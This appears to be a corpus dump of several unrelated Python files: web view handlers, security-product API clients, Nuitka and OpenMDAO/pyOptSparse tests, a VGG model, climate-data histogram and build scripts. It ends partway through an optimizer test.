# Check that the team isn't banned
if team:
if team.banned:
abort(403)
else:
pass
# Check that the token properly refers to the file
if file_id != f.id:
abort(403)
# The token isn't expired or broken
except (BadTimeSignature, SignatureExpired, BadSignature):
abort(403)
uploader = get_uploader()
try:
return uploader.download(f.location)
except IOError:
abort(404)
@views.route("/themes/<theme>/static/<path:path>")
def themes(theme, path):
"""
General static file handler
:param theme:
:param path:
:return:
"""
filename = safe_join(app.root_path, "themes", theme, "static", path)
if os.path.isfile(filename):
return send_file(filename)
else:
abort(404)
|
py | b4041df4e3b67348fb5f3469c195912dcafc02fc | # GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Component:
DESCRIPTION = "Returns one memory dump file associated with the specified task ID"
class Input:
PID = "pid"
TASK_ID = "task_id"
class Output:
CONTENTS = "contents"
class GetMemoryInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"pid": {
"type": "string",
"title": "Process ID",
"description": "Process ID",
"order": 2
},
"task_id": {
"type": "integer",
"title": "Task ID",
"description": "Task ID",
"order": 1
}
},
"required": [
"pid",
"task_id"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class GetMemoryOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"contents": {
"type": "string",
"title": "Dump Contents",
"displayType": "bytes",
"description": "Base64 encoded contents",
"format": "bytes",
"order": 1
}
},
"required": [
"contents"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
|
py | b4041e40913753fbe2226628729b949778c6f207 | """
PAPI client view for talking to the Appliance Management API
:Copyright:
Copyright 2014 Lastline, Inc. All Rights Reserved.
"""
from papi_client import loader
from papi_client import papi_client
class PapiClientApplianceMgmt(loader.PapiViewClient):
"""
Client to acccess the Lastline Appliance Management API
Detailed documentation can be found at the following URL::
https://user.lastline.com/papi-doc/api/html/appliance_mgmt/overview.html
API methods on this client take a "raw" parameter.
- If raw is set to True, the client will return the raw server response
(that is, the HTTP body) so long as the HTTP request is successful.
If the HTTP request fails a `papi_client.papi_client.CommunicationError`
is raised
- If raw is set to False, the client will try to parse the json response
and return the data field of the response. If the API response is an
error, a `papi_client.papi_client.ApiError` is raised.
:param base_client: This is the client that actually sends requests
to the API server.
:type base_client: `papi_client.papi_client.PapiClient`
:param logger: python logger to which we will log
"""
def __init__(self, base_client, logger=None):
loader.PapiViewClient.__init__(self, "appliance_mgmt", base_client,
logger=logger,
description="Appliance Management API")
def ping(self, raw=False):
"""
Ping this API to verify it is supported by the server.
"""
return self._get("ping", raw=raw)
def get_overview(self, user_id=None, raw=False):
"""
"""
params = {}
if user_id is not None:
params["user_id"] = int(user_id)
return self._get("overview", params=params, raw=raw)
def get_configuration(self, appliance_uuid, user_id=None, raw=False):
"""
Get the current configuration of an appliance.
:param appliance_uuid: Unique identifier of the appliance as received by
`get_overview()`.
"""
params = {"appliance_uuid": appliance_uuid}
if user_id is not None:
params["user_id"] = int(user_id)
return self._get("configuration", params=params, raw=raw)
def _do_action(self, appliance_uuid, action_type, action_parameters=None,
user_id=None, raw=False):
"""
Execute an action on an appliance.
:param appliance_uuid: Unique identifier of the appliance as received by
`get_overview()`.
:param action_type: The action to execute, e.g., CONFIGURE
:param action_parameters: A dict representing parameters depending on
the selected action.
"""
data = {
"appliance_uuid": appliance_uuid,
"action_type": action_type,
}
if user_id is not None:
data["user_id"] = int(user_id)
if action_parameters is not None:
data["action_parameters"] = papi_client.json.dumps(action_parameters)
return self._post("action/request", data=data, raw=raw)
def configure(self, appliance_uuid, software_version=None, auto_update=None,
settings=None, user_id=None, raw=False):
"""
Configure or re-trigger a configuration on an appliance.
See the URL above for a more extensive description of the parameters.
:param appliance_uuid: Unique identifier of the appliance as received by
`get_overview()`.
:param software_version: Set the appliance to this version.
:param auto_update: Enable or disable auto_update on this appliance.
:param settings: Type and version specific settings to configure on
the appliance. The current and default settings of a given
appliance can be received using `get_configuration()`.
"""
action_parameters = {}
if settings:
action_parameters["settings"] = settings
if auto_update is not None:
action_parameters["auto_update"] = auto_update
if software_version:
action_parameters["software_version"] = software_version
return self._do_action(
appliance_uuid=appliance_uuid,
action_type="CONFIGURE",
action_parameters=action_parameters,
user_id=user_id,
raw=raw
)
def get_action_status(self, action_uuid, user_id=None, raw=False):
"""
Get the status of an action identified by its action_uuid.
:param action_uuid: Unique identifier of the Action
"""
params = {"action_uuid": action_uuid}
if user_id is not None:
params["user_id"] = int(user_id)
return self._get("action/status", params=params, raw=raw)
|
py | b4041ea76205a1f2c0a4c26519f6c78476d25e88 | # Copyright 2019, Kay Hayen, mailto:[email protected]
#
# Python tests originally created or extracted from other peoples work. The
# parts were too small to be protected.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Reference counting tests.
These contain functions that do specific things, where we have a suspect
that references may be lost or corrupted. Executing them repeatedly and
checking the reference count is how they are used.
These are Python3.5 specific constructs, that will give a SyntaxError or
not be relevant on older versions.
"""
import os
import sys
# Find nuitka package relative to us.
sys.path.insert(
0,
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")
),
)
# isort:start
import types
from nuitka.tools.testing.Common import (
checkDebugPython,
executeReferenceChecked,
run_async,
)
checkDebugPython()
def raisy():
raise TypeError
def simpleFunction1():
async def someCoroutine():
return
run_async(someCoroutine())
####################################
def simpleFunction2():
async def someCoroutine():
return 7
run_async(someCoroutine())
####################################
class AsyncIteratorWrapper:
def __init__(self, obj):
self._it = iter(obj)
def __aiter__(self):
return self
async def __anext__(self):
try:
value = next(self._it)
except StopIteration:
raise StopAsyncIteration
return value
def simpleFunction3():
async def f():
result = []
# Python 3.5 before 3.2 won't allow this.
try:
async for letter in AsyncIteratorWrapper("abcdefg"):
result.append(letter)
except TypeError:
assert sys.version_info < (3, 5, 2)
return result
run_async(f())
####################################
def simpleFunction4():
async def someCoroutine():
raise StopIteration
try:
run_async(someCoroutine())
except RuntimeError:
pass
####################################
class ClassWithAsyncMethod:
async def async_method(self):
return self
def simpleFunction5():
run_async(ClassWithAsyncMethod().async_method())
####################################
class BadAsyncIter:
def __init__(self):
self.weight = 1
async def __aiter__(self):
return self
def __anext__(self):
return ()
def simpleFunction7():
async def someCoroutine():
async for i in BadAsyncIter():
print("never going to happen")
try:
run_async(someCoroutine())
except TypeError:
pass
def simpleFunction8():
async def someCoroutine():
return ("some", "thing")
@types.coroutine
def someDecoratorCoroutine():
yield from someCoroutine()
run_async(someDecoratorCoroutine())
def simpleFunction9():
a = {"a": 1, "b": 2}
b = {"c": 3, **a}
return b
# These need stderr to be wrapped.
tests_stderr = ()
# Disabled tests
tests_skipped = {}
result = executeReferenceChecked(
prefix="simpleFunction",
names=globals(),
tests_skipped=tests_skipped,
tests_stderr=tests_stderr,
)
sys.exit(0 if result else 1)
|
py | b4041ff3b87d29e022a48dee158fe7b589485c87 | """
Codes are modifeid from PyTorch and Tensorflow Versions of VGG:
https://github.com/pytorch/vision/blob/master/torchvision/models/vgg.py, and
https://github.com/keras-team/keras-applications/blob/master/keras_applications/vgg16.py
"""
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
import pdb
from tensorflow.keras.applications.vgg16 import VGG16 as vgg16
from tensorflow.keras.applications.vgg19 import VGG19 as vgg19
__all__ = ['VGG11', 'VGG13', 'VGG16','VGG19']
def VGG(feature, num_cls):
with tf.variable_scope('fully_connected') as scope:
dim =np.prod(feature.shape[1:])
x = tf.reshape(feature, [-1, dim])
x = tf.keras.layers.Dense(units=4096, activation='relu', name=scope.name)(x)
x = tf.keras.layers.Dense(units=4096, activation='relu', name=scope.name)(x)
x = tf.keras.layers.Dense(units=num_cls, name=scope.name)(x)
return x
def make_layers(x, cfg):
for v in cfg:
if v == 'M':
x = tf.keras.layers.MaxPool2D(pool_size=[2, 2], strides=2, padding='valid')(x)
else:
x = tf.keras.layers.Conv2D(
filters=v,
kernel_size=[3, 3],
padding='SAME',
activation=tf.nn.relu
)(x)
return x
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M',
512, 512, 512, 512, 'M'],
}
def VGG11(x_images, num_cls):
feature = make_layers(x_images, cfg['A'])
return VGG(feature, num_cls)
def VGG13(x_images, num_cls):
feature = make_layers(x_images, cfg['B'])
return VGG(feature, num_cls)
def VGG16(x_images, num_cls):
feature = make_layers(x_images, cfg['D'])
return VGG(feature, num_cls)
def VGG19(x_images, num_cls):
feature = make_layers(x_images, cfg['E'])
return VGG(feature, num_cls)
|
py | b40422b15f7d4d1f8b512a794df0836fdca83139 | from fixture.orm import ORMFixture
class DbFixture:
def __init__(self, host, database, user, password):
self.host = host
self.database = database
self.user = user
self.password = password
self.orm = ORMFixture(host=host, database=database, user=user, password=password)
def get_groups_list(self):
return self.orm.get_groups_list()
def get_contacts_list(self):
return self.orm.get_contacts_list()
def get_contacts_list_in_group(self, group):
return self.orm.get_contacts_in_group(group)
def get_contacts_not_in_group(self, group):
return self.orm.get_contacts_not_in_group(group)
|
py | b404234d443588defa20a78cd05805c2fea5d632 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import benchy_config as config
import benchy_utils as utils
import multiprocessing
import os
import shlex
import shutil
import subprocess
class Platform(object):
"""Facebook-specific Platform object.
"""
def __init__(self):
self.name = "fb"
self.build_internal_path = os.path.join(
config.SRCROOT_PATH[1:], '_build', 'USE_LOWPTR-opt', 'hphp')
def switch_to_branch(self, branch):
"""Switches the current repository to the specified branch.
This function will always be invoked prior to building a branch.
"""
utils.run_command('arc feature %s' % branch.name)
def build_branch(self, branch):
"""Builds the specified branch.
This function will always be invoked after switching to a branch.
"""
build_dir = branch.build_dir()
build_link = os.path.join(config.SRCROOT_PATH, '_build')
if os.path.islink(build_link):
os.remove(build_link)
else:
shutil.rmtree(build_link, ignore_errors=True)
env = os.environ.copy()
env['FBMAKE_BUILD_ROOT'] = build_dir
cpus = multiprocessing.cpu_count()
utils.run_command('/usr/local/bin/fbmake --build-root "%s" '
'--build-flag USE_LOWPTR --distcc=off opt -j%d' % (build_dir, cpus), env=env)
|
py | b4042454a3294f1ac08e4931c592bd19ef79e9f2 | import xarray as xr
import numpy as np
import pei.myfunctions as mf
from xhistogram.xarray import histogram
# Load WBT data
ds = xr.open_mfdataset('../data/processed/WBTdaily/WBTdailyens*.nc',combine='nested',concat_dim='ensemble',chunks={'time':1095})
# Load area data
land_area = xr.open_dataset('../data/processed/wbt.land_area')
land_mask = np.isfinite(land_area)
# Reduce WBT data
ds_adj = ds['WBT'].where(land_mask,drop=True).rename({'__xarray_dataarray_variable__':'WBT'})
# Get WBT
var = ds_adj['WBT']
# Bins to divide data at each point in time
bins = np.arange(-52,35,0.1)
# Loop through years
for year in range(2001,2070):
# Get data for specific year
var_year = var.where(var['time.year']==year,drop=True)
# Histogram in time dimension for this year
dist = histogram(var_year,bins=[bins],dim=['time'])
# Save this year's histogram data as netCDF
dist.to_netcdf('../data/processed/WBTyearly/WBT'+str(year)+'.nc') |
py | b40424821719a36ee774ffac749418af713c217a | from setuptools import setup, find_packages
setup(name='mr_tools', version='1.0', packages=find_packages()) |
py | b404250fb3bd86f4d1c54a2a5acc607965416526 | from . import dataloader |
py | b40425c80a46e0c190721a0e9e456351e51352c7 | from collections import defaultdict
import logging
import numpy as np
class Logger:
def __init__(self, console_logger):
self.console_logger = console_logger
self.use_tb = False
self.use_sacred = False
self.use_hdf = False
self.stats = defaultdict(lambda: [])
def setup_tb(self, directory_name):
# Import here so it doesn't have to be installed if you don't use it
from tensorboard_logger import configure, log_value
configure(directory_name)
self.tb_logger = log_value
self.use_tb = True
def setup_sacred(self, sacred_run_dict):
self.sacred_info = sacred_run_dict.info
self.use_sacred = True
def log_stat(self, key, value, t, to_sacred=True):
self.stats[key].append((t, value))
if self.use_tb:
self.tb_logger(key, value, t)
if self.use_sacred and to_sacred:
if key in self.sacred_info:
self.sacred_info["{}_T".format(key)].append(t)
self.sacred_info[key].append(value)
else:
self.sacred_info["{}_T".format(key)] = [t]
self.sacred_info[key] = [value]
def print_recent_stats(self):
log_str = "Recent Stats | t_env: {:>10} | Episode: {:>8}\n".format(*self.stats["episode"][-1])
i = 0
for (k, v) in sorted(self.stats.items()):
if k == "episode":
continue
i += 1
window = 5 if k != "epsilon" else 1
item = "{:.4f}".format(np.mean([x[1] for x in self.stats[k][-window:]]))
log_str += "{:<25}{:>8}".format(k + ":", item)
log_str += "\n" if i % 4 == 0 else "\t"
self.console_logger.info(log_str)
# set up a custom logger
def get_logger():
logger = logging.getLogger()
logger.handlers = []
ch = logging.StreamHandler()
formatter = logging.Formatter('[%(levelname)s %(asctime)s] %(name)s %(message)s', '%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.setLevel('DEBUG')
return logger
|
py | b4042606d2d76266dbea892299811bd9d3b69280 | """ Unit tests for the Pyoptsparse Driver."""
import unittest
import numpy as np
from openmdao.api import Problem, Group, IndepVarComp, ExecComp, AnalysisError, ExplicitComponent
from openmdao.devtools.testutil import assert_rel_error
from openmdao.test_suite.components.paraboloid import Paraboloid
from openmdao.test_suite.components.expl_comp_array import TestExplCompArrayDense
from openmdao.test_suite.components.sellar import SellarDerivativesGrouped
from openmdao.utils.general_utils import set_pyoptsparse_opt
# check that pyoptsparse is installed
# if it is, try to use SNOPT but fall back to SLSQP
OPT, OPTIMIZER = set_pyoptsparse_opt('SNOPT')
if OPTIMIZER:
from openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver
class ParaboloidAE(ExplicitComponent):
""" Evaluates the equation f(x,y) = (x-3)^2 + xy + (y+4)^2 - 3
This version raises an analysis error 50% of the time.
The AE in ParaboloidAE stands for AnalysisError."""
def __init__(self):
super(ParaboloidAE, self).__init__()
self.fail_hard = False
def setup(self):
self.add_input('x', val=0.0)
self.add_input('y', val=0.0)
self.add_output('f_xy', val=0.0)
self.eval_iter_count = 0
self.eval_fail_at = 3
self.grad_iter_count = 0
self.grad_fail_at = 100
self.declare_partials('*', '*')
def compute(self, inputs, outputs):
"""f(x,y) = (x-3)^2 + xy + (y+4)^2 - 3
Optimal solution (minimum): x = 6.6667; y = -7.3333
"""
if self.eval_iter_count == self.eval_fail_at:
self.eval_iter_count = 0
if self.fail_hard:
raise RuntimeError('This should error.')
else:
raise AnalysisError('Try again.')
x = inputs['x']
y = inputs['y']
outputs['f_xy'] = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0
self.eval_iter_count += 1
def compute_partials(self, inputs, partials):
""" Jacobian for our paraboloid."""
if self.grad_iter_count == self.grad_fail_at:
self.grad_iter_count = 0
if self.fail_hard:
raise RuntimeError('This should error.')
else:
raise AnalysisError('Try again.')
x = inputs['x']
y = inputs['y']
partials['f_xy','x'] = 2.0*x - 6.0 + y
partials['f_xy','y'] = 2.0*y + 8.0 + x
self.grad_iter_count += 1
class TestPyoptSparse(unittest.TestCase):
def setUp(self):
if OPT is None:
raise unittest.SkipTest("pyoptsparse is not installed")
if OPTIMIZER is None:
raise unittest.SkipTest("pyoptsparse is not providing SNOPT or SLSQP")
def test_simple_paraboloid_upper(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_upper_indices(self):
prob = Problem()
model = prob.model = Group()
size = 3
model.add_subsystem('p1', IndepVarComp('x', np.array([50.0]*size)))
model.add_subsystem('p2', IndepVarComp('y', np.array([50.0]*size)))
model.add_subsystem('comp', ExecComp('f_xy = (x-3.0)**2 + x*y + (y+4.0)**2 - 3.0',
x=np.zeros(size), y=np.zeros(size),
f_xy=np.zeros(size)))
model.add_subsystem('con', ExecComp('c = - x + y',
c=np.zeros(size), x=np.zeros(size),
y=np.zeros(size)))
model.connect('p1.x', 'comp.x')
model.connect('p2.y', 'comp.y')
model.connect('p1.x', 'con.x')
model.connect('p2.y', 'con.y')
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('p1.x', indices=[1], lower=-50.0, upper=50.0)
model.add_design_var('p2.y', indices=[1], lower=-50.0, upper=50.0)
model.add_objective('comp.f_xy', index=1)
model.add_constraint('con.c', indices=[1], upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['p1.x'], np.array([50., 7.16667, 50.]), 1e-6)
assert_rel_error(self, prob['p2.y'], np.array([50., -7.833334, 50.]), 1e-6)
def test_simple_paraboloid_lower(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_lower_linear(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=15.0, linear=True)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
self.assertEqual(prob.driver._quantities, ['comp.f_xy'])
def test_simple_paraboloid_equality(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', equals=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_equality_linear(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', equals=-15.0, linear=True)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_simple_paraboloid_double_sided_low(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=-11.0, upper=-10.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['y'] - prob['x'], -11.0, 1e-6)
def test_simple_paraboloid_double_sided_high(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_array_comp2D(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('widths', np.zeros((2, 2))), promotes=['*'])
model.add_subsystem('comp', TestExplCompArrayDense(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = areas - 20.0', c=np.zeros((2, 2)), areas=np.zeros((2, 2))),
promotes=['*'])
model.add_subsystem('obj', ExecComp('o = areas[0, 0]', areas=np.zeros((2, 2))),
promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('widths', lower=-50.0, upper=50.0)
model.add_objective('o')
model.add_constraint('c', equals=0.0)
prob.setup(check=False)
prob.run_driver()
obj = prob['o']
assert_rel_error(self, obj, 20.0, 1e-6)
def test_simple_array_comp2D_array_lo_hi(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('widths', np.zeros((2, 2))), promotes=['*'])
model.add_subsystem('comp', TestExplCompArrayDense(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = areas - 20.0', c=np.zeros((2, 2)), areas=np.zeros((2, 2))),
promotes=['*'])
model.add_subsystem('obj', ExecComp('o = areas[0, 0]', areas=np.zeros((2, 2))),
promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('widths', lower=-50.0*np.ones((2, 2)), upper=50.0*np.ones((2, 2)))
model.add_objective('o')
model.add_constraint('c', equals=0.0)
prob.setup(check=False)
prob.run_driver()
obj = prob['o']
assert_rel_error(self, obj, 20.0, 1e-6)
def test_fan_out(self):
# This tests sparse-response specification.
# This is a slightly modified FanOut
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 1.0))
model.add_subsystem('p2', IndepVarComp('x', 1.0))
model.add_subsystem('comp1', ExecComp('y = 3.0*x'))
model.add_subsystem('comp2', ExecComp('y = 5.0*x'))
model.add_subsystem('obj', ExecComp('o = i1 + i2'))
model.add_subsystem('con1', ExecComp('c = 15.0 - x'))
model.add_subsystem('con2', ExecComp('c = 15.0 - x'))
# hook up explicitly
model.connect('p1.x', 'comp1.x')
model.connect('p2.x', 'comp2.x')
model.connect('comp1.y', 'obj.i1')
model.connect('comp2.y', 'obj.i2')
model.connect('comp1.y', 'con1.x')
model.connect('comp2.y', 'con2.x')
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('p1.x', lower=-50.0, upper=50.0)
model.add_design_var('p2.x', lower=-50.0, upper=50.0)
model.add_objective('obj.o')
model.add_constraint('con1.c', equals=0.0)
model.add_constraint('con2.c', equals=0.0)
prob.setup(check=False)
prob.run_driver()
obj = prob['obj.o']
assert_rel_error(self, obj, 30.0, 1e-6)
# Verify that pyOpt has the correct wrt names
con1 = prob.driver.pyopt_solution.constraints['con1.c']
self.assertEqual(con1.wrt, ['p1.x'])
con2 = prob.driver.pyopt_solution.constraints['con2.c']
self.assertEqual(con2.wrt, ['p2.x'])
def test_inf_as_desvar_bounds(self):
# User may use np.inf as a bound. It is unneccessary, but the user
# may do it anyway, so make sure SLSQP doesn't blow up with it (bug
# reported by rfalck)
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-np.inf, upper=np.inf)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_pyopt_fd_solution(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'pyopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-4)
assert_rel_error(self, prob['y'], -7.833334, 1e-4)
def test_pyopt_fd_is_called(self):
class ParaboloidApplyLinear(Paraboloid):
def apply_linear(params, unknowns, resids):
raise Exception("OpenMDAO's finite difference has been called. pyopt_fd\
\ option has failed.")
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', ParaboloidApplyLinear(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'pyopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_constraint('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
def test_snopt_fd_solution(self):
